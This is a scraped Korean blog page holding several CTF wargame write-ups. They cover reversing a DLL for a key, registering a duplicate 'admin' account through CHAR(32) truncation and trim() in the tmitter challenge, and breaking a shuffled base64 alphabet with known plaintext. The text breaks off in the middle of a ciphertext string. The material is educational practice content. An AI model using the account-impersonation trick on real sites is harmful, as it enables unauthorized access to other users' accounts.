728x90
반응형
728x90
반응형
728x90
반응형

DLL with notepad

 

DLL Reverse Engineering Challenge.

Can you reversing DLL File?

 

 

 

파일이 두개 들어있는 압축파일이 주어진다.

 

notepad.exe는 메모장과 별 다를게 없어보인다.

 

blueh4g13.dll 파일을 ida로 열어서 shift+f12로 문자열을 확인해 보았다.

 

 

oh!로 시작하는 문자열을 찾을 수 있다.

 

 

sub_100010C0에서 사용되었다.

 

 

 

ollydbg로 notepad.exe를 열어서 view> Executable modules로 들어간다. (Alt+E)

 

거기서 blueh4g13.dll 파일을 찾아서 더블클릭.

 

F9로 실행을 한 뒤, dll 파일에서 문자열을 확인해 주면 key값을 찾을 수 있다.

728x90
반응형

'WAR GAME > wargame.kr' 카테고리의 다른 글

Wargame.kr [CustomOS]  (0) 2020.01.09
Wargame.kr [DLL with notepad] 풀이  (0) 2020.01.08
Wargame.kr [QnA] 풀이  (0) 2020.01.06
Wargame.kr [dmbs335] 풀이  (0) 2020.01.06
Wargame.kr [Crypto Crackme Basic] 풀이  (0) 2020.01.06
Wargame.kr [crack crack crack it] 풀이  (0) 2020.01.06
728x90
반응형

tmitter

you need login with "admin"s id!

===========================

create table tmitter_user(
idx int auto_increment primary key,
id char(32),
ps char(32)
);

 

 

join.php의 소스를 보면, 하단에 힌트가 있다.

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
 
<head>
 <style>
  body {background-color:#eef;}
  table td {text-align:center; background-color:#dde;}
  .ex {text-align:left; color:#99a; font-size:9pt;}
 </style>
 <script>
  function chk(f){
   if(f.id.value.length<4){alert("chk id"); return false;}
   if(f.ps.value.length<7){alert("chk ps"); return false;}
   return true;
  }
 </script>
</head>
<body>
<center>
 <img src="./tmitter.png">
 <form onsubmit="return chk(this);" method="post">
  <table>
   <tr><td>ID</td><td><input type="text" name="id" maxlength="32"></td><td class="ex">at least 4char</td></tr>
   <tr><td>PS</td><td><input type="password" name="ps" maxlength="32"></td><td class="ex">at least 7char</td></tr>
   <tr><td colspan=2><input type="submit" value="join"></td></tr>
  </table>
 </form>
</body>
<!-- hint : you need join with admin -->
 
cs

 

admin으로 회원가입을 해야 한다.

 

그러나 id가 admin인 계정을 생성하려고 하면, admin이라는 계정이 존재한다고 나온다.

 

 

 

php 페이지 상에서 trim(id) 한 값이 db에 있는 id중에 있는지 확인 한 후, db에 들어가는 것 같다.

trim() : 문자열의 앞과 뒤의 공백을 제거

 

 

 

"admin"+""*(32-5)+"dummy"를 id에 입력해주면

 

"admin"+""*(32-5)+"dummy" != "admin" 이기 때문에 존재하지 않는 id가 되며,

 

id char(32) --> id에는 32글자밖에 못들어가므로, "admin"+""*(32-5)+"dummy" 중 32글자가 들어가고, 뒤에 dummy가 잘리게 된다. 뒤에 남은 공백은 trim으로 날라가서 id가 admin으로 가입이 완료된다.

 

 

 

가입 페이지의 id입력란 길이가 32글자로 제한되어 있는데, f12개발자 도구 이용해서 간단히 수정해주면 된다.

 

728x90
반응형

'WAR GAME > wargame.kr' 카테고리의 다른 글

Wargame.kr [img recovery] 풀이  (0) 2019.12.31
Wargame.kr [type confusion] 풀이  (0) 2019.12.31
Wargame.kr [tmitter] 풀이  (0) 2019.12.31
Wargame.kr [fly me to the moon] 풀이  (0) 2019.12.24
Wargame.kr [DB is really GOOD] 풀이  (0) 2019.12.24
Wargame.kr [strcmp] 풀이  (0) 2019.12.24
728x90
반응형

System32.kr 

[EZB64] 풀이

 

 

 

코드는 이러하다 :

import flag
flag = flag.EZB64
story='''The usage "crib" was adapted from a slang term referring to cheating (e.g., "I cribbed my answer from your test paper"). A "crib" originally was a literal or interlinear translation of a foreign-language text-usually a Latin or Greek text-that students might be assigned to translate from the original language.
The idea behind a crib is that cryptologists were looking at incomprehensible ciphertext, but if they had a clue about some word or phrase that might be expected to be in the ciphertext, they would have a "wedge," a test to break into it. If their otherwise random attacks on the cipher managed to sometimes produce those words or (preferably) phrases, they would know they might be on the right track. When those words or phrases appeared, they would feed the settings they had used to reveal them back into the whole encrypted message to good effect.
In the case of Enigma, the German High Command was very meticulous about the overall security of the Enigma system and understood the possible problem of cribs. The day-to-day operators, on the other hand, were less careful. The Bletchley Park team would guess some of the plaintext based upon when the message was sent, and by recognizing routine operational messages. For instance, a daily weather report was transmitted by the Germans at the same time every day. Due to the regimented style of military reports, it would contain the word Wetter (German for "weather") at the same location in every message. (Knowing the local weather conditions helped Bletchley Park guess other parts of the plaintext as well.) Other operators, too, would send standard salutations or introductions. An officer stationed in the Qattara Depression consistently reported that he had nothing to report. "Heil Hitler," occurring at the end of a message, is another well-known example.
At Bletchley Park in World War II, strenuous efforts were made to use (and even force the Germans to produce) messages with known plaintext. For example, when cribs were lacking, Bletchley Park would sometimes ask the Royal Air Force to "seed" a particular area in the North Sea with mines (a process that came to be known as gardening, by obvious reference). The Enigma messages that were soon sent out would most likely contain the name of the area or the harbour threatened by the mines.
The Germans themselves could be very accommodating in this regard. Whenever any of the turned German Double cross agents sent a message (written by the British) to their respective handlers, they frequently obligingly re-encrypted the message word for word on Enigma for onward transmission to Berlin.
When a captured German revealed under interrogation that Enigma operators had been instructed to encode numbers by spelling them out, Alan Turing reviewed decrypted messages and determined that the number "eins" ("one") was the most common string in the plaintext. He automated the crib process, creating the Eins Catalogue, which assumed that "eins" was encoded at all positions in the plaintext. The catalogue included every possible position of the various rotors, starting positions, and keysettings of the Enigma.
The Polish Cipher Bureau had likewise exploited "cribs" in the "ANX method" before World War II (the Germans' use of "AN", German for "to", followed by "X" as a spacer to form the text "ANX").
The United States and Britain used one-time tape systems, such as the 5-UCO, for their most sensitive traffic. These devices were immune to known-plaintext attack; however, they were point-to-point links and required massive supplies of one time tapes. Networked cipher machines were considered vulnerable to cribs, and various techniques were used to disguise the beginning and ends of a message, including cutting messages in half and sending the second part first and adding nonsense padding at both ends. The latter practice resulted in the world wonders incident. The KL-7, introduced in the mid-1950s, was the first U.S. cipher machine that was considered safe against known-plaintext attack.
Classical ciphers are typically vulnerable to known-plaintext attack. For example, a Caesar cipher can be solved using a single letter of corresponding plaintext and ciphertext to decrypt entirely. A general monoalphabetic substitution cipher needs several character pairs and some guessing if there are fewer than 26 distinct pairs._______
'''
import base64,random,string
table = string.ascii_uppercase + string.ascii_lowercase + string.digits + '+/'
rtable = ''.join(random.sample(table,len(table)))
tb=string.maketrans(table,rtable)
orig=base64.b64encode(story+flag)
print(orig.translate(tb))
#Output : CpIMrXCk5u7MrSZoQcMsrsBy5LU45uKIQXKMGSBcQca0rpV4QxiI3cQ47pCw3qBwGuGMQYZt3cQ47p+45xIM5LKt3cQ4EpFgGwd/rSZZrpfwTuZsGul43LP45uJk7xCwrpGw3xe4jua1QsBeGLferXBIQpCwrsPgrVV4rcfwTursrpawTu7t3cn/3XP47xnkrpV43pMeGLZI3SB6QsBt3YKMQcit3cCIQsBeQcngQxiI7pM63sB6GsBIrpG6QcCtGxd03pngGyCIGxF47pCd7S11QyCI3piJrpV4OpneTud43yr4KyZMGu/47pCd7S1eTpnerXfe7uKM3YKkrp1tGxIerpZMrpnkQxMY3cCPrXK6rXKw5uJk3pneGqBcQca0rXKbGqB6QcMYTuJI3SB/5uJY7unYGqdESMKbGqBtGpCIrpZMTpMgGSBIrpfwTur4TLU47pII7SBoQYMz7pa/3x7tQyKkrX7MQcF43pa6TxMgGwBI7SBt3cf63LBwGuIM3Yft5ciMrpftQpIMQYKMjXl/rpZ17SBtGsBeTpCJrpIIGSBIrpf/7uF45uZ67Ll4Qxa0GqBy3yZPrpawrXBbQcnkGqBeTpnerp1tGxIerpZMrpCdQpCo7pCPrXK6rpZMrpMgrXKbGqBoTLBbGLZeGLIehSBeTpCJrX767uiPrpII7cF45q2s7xCPGxF/rsBIrXKMQyl47p+45YZM5u/4TuJe3wBt7Sd4qu547pIMTLr43yKbGLZyTLfMrXZI3cK63qBI7XKI5x0krpagrXKbGqBoTLBbGLr43ung5u7MGSBe3wBk3x1M7pM0GLU4QXZ6GXCoGqBeTpakGqBy3yZPQwB6Qs2bQXZMGcCw5uZ/jqP4QpIw5LfMQwz47pIMjqBy3yC/GSBN3cayrXKbGLP43uMYTXl45cF43xd47pIMrXZtGxIerXKw5ufNhsBLTpCgrXKb3yfMrX76QcKkrpawrXBbQcnkGLU45LBzGunwGul/rXKbGLP47xa13pl4GcCMGSBeTpF4QxCe7pMgGyU47pIMjqBb5ul47LfMGSBe3wBwGLGM5uz47pIM3qBs5ufNrpMg7p+47pIMrX7b3xiMrpCg5yZJQXKMGSB0GLfk5u7MrXK6rp763xl4GuGcGufeh4bEqud47pIMrpfIQxF43x54KuJtGx1IhSBeTpF4KxCw3ungrVItGx44lxa03ungGSBy5LU47cCwjqB0GLKt5yC/3yCkrpns3yCerXKbGqB67cCw5ui/rXfM5yCwTLKJrpacrXKbGqBn3cMY3uV4QyMk7pC0rpngGSB13cKMQYfe3xaPrXKbGqBz3yfkTuZ/GqBzQcas3pC0rpacrpfwTuZkhsBFTpF4GpnJhLK6huKIjqB6QpCw5LK6QYU/rpagrXKbGqB67pIMQsBb5uJPhSByGLZMrpiMQyU45xnwGuG13Sd4CpIMrVZ/GLKoTpiMjqBl5LZNrXKM5ue47xa13pl4GyCMQyU4Qxa0GqB6GsBeTpF4QpiITuJeGLIerpZIQxCPrXCz3xd47xIM3sBeTpF43uCkQxnYGqBy5LU4QxCg7Sz45uJPrpZJrXZM5xaY3cMvTuJYrXZ67LKt3cF43yBMQcneTuag5uz43uCkQxnYGLUgrVG6QsBt3Yfe5uJoGqz45qBP5uM/jqByGuneTpCwrXZMQpaw7SBy5LU47XZI3Yf0TLKeGul45YP47pIMrV7MQc1I3YU45Ll47pIMrXfI3uF47pM0GqBM7cCwjqBP5LPgrVK1GqBe3wBeTpF4QcCYTu1M3YKMGSBk7XM/GqB6GsB0Tuit7pnwjqBwGLB6QYKkhSBt7SBy3yC/GSBo3xJe5uMgrXKbGqBy3yZPrn7M7XKMQs2bKxCw3ungrpG6Qs2s7xCI7pIMQsrtrpnerXKbGqBk5u1Mrpi65xneTuagrpMgrpCxGLZJrp1MQyfIGxFgrSIh3cayTuJYrXKbGqB/3xfI3SByGuneTpCwrpf63cKt7pM63YU4TpC/QpCPrVZ/GLKoTpiMjqBl5LZNrp71GLfkrpaeTpCwrXBIQYKkrpacrXKbGqBz3pnt3YKMjXl45LU47xC/3SdtrVaeTpCwrpazGLZI7pawQwz47pa6hSBy3yC/GSBkGuJPrXfe5uJP5LZPrXfI3XCe5LKt3xJkrpawrpMg7XZ6GXCo7pM63YUgrVngrpacGcMoGLr4QyKI7pM63cCPrpMgrXKbGqBK5LKe5LZIrVKMQXZMQyft3xd45xagQxMk7pCg7piJrXZMQpaw7pCPrXKb5Ll4TpF4TpnPrpJ67pIt3cQ47p+4QcCz3yZehs2sqpCt3SBrTLK/GLr/rsB65xf1QYZt3cQ45Ll47pIMrpCgGSB6GsBIrp1MQyfIGxF/rpMkrpng3yKbGLr47xC/3S1N3cay3sBMjpn0QpiMh4bElLl4lciM7pfb3pCJrnBIQc/4Tud4Cxaw3pl4CxnwrVMZhSBk7XZM3YC67LU4GuGc3yZeQwByGLZMrp1IGpF47p+47LfMrSII3cl4GLGM3sBc3yZoGqBeTpF4KxCw3ungQwBe3wBzQcaP7ufMEqB0GLfk5u7MQwByTLKbrp0g3y7grXB/5uMg7pCd7Sd4KcawrpCd5u1z3pF/rX7bGud45yZt5YU47xCwGqB/5ufNTuJYhSBS3pCe5xI/GLP4FpnwTwBy3yC/GSBk3x1M7pM0GLU45LfNrXKbGqBq3yMI3SBBTLr4Kcaw5xF47p+4rYfMGulsrpV4Qpnw7pMo7uiIQsBIQcCIrpMgrXKbGqBm3yZeTSBOGuV47xMeTSB0TuJMQw2b5qBzQcaoGLfkrXKb5Ll45xn0GqBe3wBsGqBN3cay3sBIQwBY5LZPGuJt3cQ/rpZJrpas7cM67LU4QcCcGLZM3cfMEqd4CpIMrVCgTu705qB0GLfk5u7MQwBeTpnerX7MQcF4Qxa63sBkGuJerpa17SBy3yC/GSB03yferpitTxC/jqBo3xJe5uMgrXKbGqBg5u1MrpacrXKbGqBIQcCIrpawrXKbGqBb5LZs3yCwrXKbQcCI7pCgGul45YP47pIMrp1t3cCkh4bECpIMrV7MQc1I3YU47pIM3LfM3XGMQwBo3yC/GSBsGqBxGLZJrpno5xa03uaP5LKt3cQ4Tud47pItQwBwGu7IQclgrn7bGuJM7cCwrpngjqB6GsBeTpF47XCw3cCPrV7MQc1I3sBV3yCs3pF45yZ6QyU45u7M3YKkrXfM3Yl45qB0GLfk5u7MrSIyQcMe7pCgrpZJrXKbGqBSQcMeTLfbEqBe3wBeTpCtQsBwGLfzGufeTLGMrpII3cK/GLZkhSBeTpCJrpGwGLn1GuJe3XP43xZ/Tu7t3c7/jqBwGq1M3cfwjLBeGul47pIMrp1MQyfIGxF47xawGSBc3yr47xawGSB63sBn3cMY3uV4Gcawrpag7xnwGSBeQcngQx1tQyft3xd47p+4lcCw3pMgh4bECxIM3sBIrpfIQXK1QcCPrV7MQc1I3sBwGLGM5uiMGSB13cKMQsBt3YKMQYZ6GxneTuagrXKb5Ll4KuJtGx1IrpazGLZI7pawQwBb5ul45cCM3sBt3YfeQYCo7pCPrXK6rpCg5xaPGqBg7u1sGLZkrpZJrXfzGui/TuJYrXKbGue43yCehSBB3pngrnK1QcMgGwBwGLGtGL7MGSBPGufwjLBeGul43uCkQxnYGLU45uJPrpKM7pCw3uMgGul47pII7SBeTpF43YC05cCwrSZMTuJkrs2brcagGqrtrX7IQwBeTpF43uak7SBo3x103xd4QyKwTuJYrpMgrXKbGqBz3pnt3YKMjXlgrVIMrpn17pa05LKMGSBeTpF45yZt5sBzQcaoGLfkhSBoQcCI7pMgGwBeTpF4KuMgQwBA5LKI3paY7uF/rX7bTufbrpnkQyC0Gul47pII7S2sGuMgQwr47xnkrpCg5xaPGul45Ll45ui/rXB6QxMeTuagQwBt3sBeTpF4QpiITuJeGLIehsBFTpF45xne5ui6GyCMrpMg5xi1GpCPrpCxGLZJrXB6Qyft5ciMrXB6QxMeTuagrpacrXKbGqBx5LZt3yCkrXZ67pawQwz4QyKIQYKt3cQ4QpakTLKt3xJkhSBI3cl4TxCJQxCe7pMgGyU43x547pIMrVCgTu705qdESMKbGqBl3xitQx44lxMzTpCwrVZ1QcCI7qBb5ul43pMNGL7tQxF4GLIz3pat7pCPrSZoQcMsQwr4Tud47pIMrSZBOM443uCeTpaPrsBsGuG6QcF4Cxaw3pl4CxnwrVMZrSIeTpF4KxCw3ungQwQ47LfMrpacrSZBOsr/rV7MQc1I3sBc3yr4rYK6rsz4Gca/3payGul45YP4rM4srpnkrpV4QyBI5xCwrXK6rpG6Qce47pIMrXKMjXl4rPnmuSrth4bECpIMrnCgTLKMGSBO7pneGLU45uJPrVZwTLKITud47LfMGSB63cF07pM0GqBe5LBMrXfJQyKM3LU/rXf15x445LU47pIMrAF0CFfHhSBc3yr47pIMTLr43uak7SBkGuJkTLKt7cF47XZIGcGt5wd4CpIMQxF4GpCxTufMQwByGLZMrpM03LCgGqBe3wBN3cay3s1z3pnt3YKMjXl45LKe5ufNmwBb3y7M7cCwhSBeTpCJrX7MQcF4Qpat3Yl07p+0Qpat3Yl43pMgTyU45uJPrXZMQLCtQcCPrp1IQyft7cF4QyCzQpitGLU43x543xJMrXKt3uF47pnzGLUgrVJM7X76Qc0MGSBoTLBbGLr43unoTpMgGLU47xCwGqBo3xJkTuKMQcCPrXG13pJMQcns3pF47p+45yZt5YU/rpngGSBx5LZt3yCkrXKM5xIgTLn1GLU47xCwGqB1QxCPrXK6rpKtQx71TLfMrXKbGqBsGu7t3cJt3cQ45uJPrpCgGXU43x545qB0GLfk5u7MhSBt3cf/7uKt3cQ45yCe7pMgGwB0GLfk5u7MQwBt3sBb5uicrpngGSBkGuJPTuJYrXKbGqBkGuf63cl4Qpnw7SBcTLZk7SBI3cl45uKPTuJYrpJ63YfM3YfMrXBIGpKt3cQ45Ll45caeTSBM3cKkhsBFTpF43pne7pCwrXBw5ufeTufMrXZMQyC/7pCPrpMgrXKbGqBy3yZ/GSBy3xJPGLZkrpMg5xMPGuJehsBFTpF4qez0fwz4TuJeQcaP7ufMGSBt3sBeTpF43uMPhOVJfOBkhSBy5LU47pIMrpGtQYfernFgFwd45xMzTpCwrp1I5xIt3cF47pII7SBy5LU45xagQxMPGLZMGSBk5uGMrpnY5uMgQyl4TxJ67xd0QpiITuJeGLIerpne7pnoTwdESPf/5LfkTufI3SBoTLBbGLZkrpnwGqBejLBt5xn/3XP47YC/3cCw5uZ/GqBe3wBN3cay3s1z3pnt3YKMjXl45LKe5ufNhsBp3yr4GLII3LB/Gqz45qBA5uCk5Lr45xMzTpCwrpfI3sBsGqBk3xixGul47Lft3cQ45qBkTuJY3pF43pCe7pCwrpacrpf6QYZMQyB63cKt3cQ4QpiITuJeGLIerpngGSBoTLBbGLZeGLIerXK6rpKM5yZJQXl4GuJeTLZM3XPgrVV4GxCgGLZI3SB03xJ65uizTpnsGLKt5wBk7uZk7pMe7LKt3xd45xMzTpCwrpJMGuKkrXfM7cCw5uz45xIIQcno7pCwrXBITLZkrpngGSBk3x1Mrp71GLfkTuJYrpMcrXKbGLZMrpnwGqBcGL7MQsBeTpngrArxrpKtQyKt3cferXBITLZkhMaWL1aWL1+EKciIGy0eTpMkLxMkLyK631aMjMac3yZWCCat3cMeHye=

 

table = A-Za-z0-9+/

 

stroy에 flag를 붙여서 base64 인코딩을 하고, 랜덤으로 만든 테이블로 치환을 해서 출력을 한다.

 

 

 

만약

table=ABCDE

rtable=qwert

이면, A는 q로, B는 w로 치환하는 것이다.

 

 

 

 

 

flag를 얻기 위해서는 rtable를 구해야 한다.

 

샘플을 충분히 제공하기 때문에, rtable를 쉽게 구할 수 있다.

 

story만을 base64로 인코딩하면 VGhlIHVzYWdlICJjcmliIi....이 나오는데

 

이를 Output과 비교를 하게 되면 V->C, G->p, h->I 이렇게 1:1대응이 된다.

 

 

 

 

 

 

1:1 대응 리스트를 쫙 뽑아서 rtable를 만들고 rtable->table로 Output를 바꿔주어서 base64 디코딩을 하면 flag를 구할 수 있다.

 

 

python2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
story='''The usage "crib" was adapted from a slang term referring to cheating (e.g., "I cribbed my answer from your test paper"). A "crib" originally was a literal or interlinear translation of a foreign-language text-usually a Latin or Greek text-that students might be assigned to translate from the original language.
 
The idea behind a crib is that cryptologists were looking at incomprehensible ciphertext, but if they had a clue about some word or phrase that might be expected to be in the ciphertext, they would have a "wedge," a test to break into it. If their otherwise random attacks on the cipher managed to sometimes produce those words or (preferably) phrases, they would know they might be on the right track. When those words or phrases appeared, they would feed the settings they had used to reveal them back into the whole encrypted message to good effect.
 
In the case of Enigma, the German High Command was very meticulous about the overall security of the Enigma system and understood the possible problem of cribs. The day-to-day operators, on the other hand, were less careful. The Bletchley Park team would guess some of the plaintext based upon when the message was sent, and by recognizing routine operational messages. For instance, a daily weather report was transmitted by the Germans at the same time every day. Due to the regimented style of military reports, it would contain the word Wetter (German for "weather") at the same location in every message. (Knowing the local weather conditions helped Bletchley Park guess other parts of the plaintext as well.) Other operators, too, would send standard salutations or introductions. An officer stationed in the Qattara Depression consistently reported that he had nothing to report. "Heil Hitler," occurring at the end of a message, is another well-known example.
 
At Bletchley Park in World War II, strenuous efforts were made to use (and even force the Germans to produce) messages with known plaintext. For example, when cribs were lacking, Bletchley Park would sometimes ask the Royal Air Force to "seed" a particular area in the North Sea with mines (a process that came to be known as gardening, by obvious reference). The Enigma messages that were soon sent out would most likely contain the name of the area or the harbour threatened by the mines.
 
The Germans themselves could be very accommodating in this regard. Whenever any of the turned German Double cross agents sent a message (written by the British) to their respective handlers, they frequently obligingly re-encrypted the message word for word on Enigma for onward transmission to Berlin.
 
When a captured German revealed under interrogation that Enigma operators had been instructed to encode numbers by spelling them out, Alan Turing reviewed decrypted messages and determined that the number "eins" ("one") was the most common string in the plaintext. He automated the crib process, creating the Eins Catalogue, which assumed that "eins" was encoded at all positions in the plaintext. The catalogue included every possible position of the various rotors, starting positions, and keysettings of the Enigma.
 
The Polish Cipher Bureau had likewise exploited "cribs" in the "ANX method" before World War II (the Germans' use of "AN", German for "to", followed by "X" as a spacer to form the text "ANX").
 
The United States and Britain used one-time tape systems, such as the 5-UCO, for their most sensitive traffic. These devices were immune to known-plaintext attack; however, they were point-to-point links and required massive supplies of one time tapes. Networked cipher machines were considered vulnerable to cribs, and various techniques were used to disguise the beginning and ends of a message, including cutting messages in half and sending the second part first and adding nonsense padding at both ends. The latter practice resulted in the world wonders incident. The KL-7, introduced in the mid-1950s, was the first U.S. cipher machine that was considered safe against known-plaintext attack.
 
Classical ciphers are typically vulnerable to known-plaintext attack. For example, a Caesar cipher can be solved using a single letter of corresponding plaintext and ciphertext to decrypt entirely. A general monoalphabetic substitution cipher needs several character pairs and some guessing if there are fewer than 26 distinct pairs._______
'''
 
tran='''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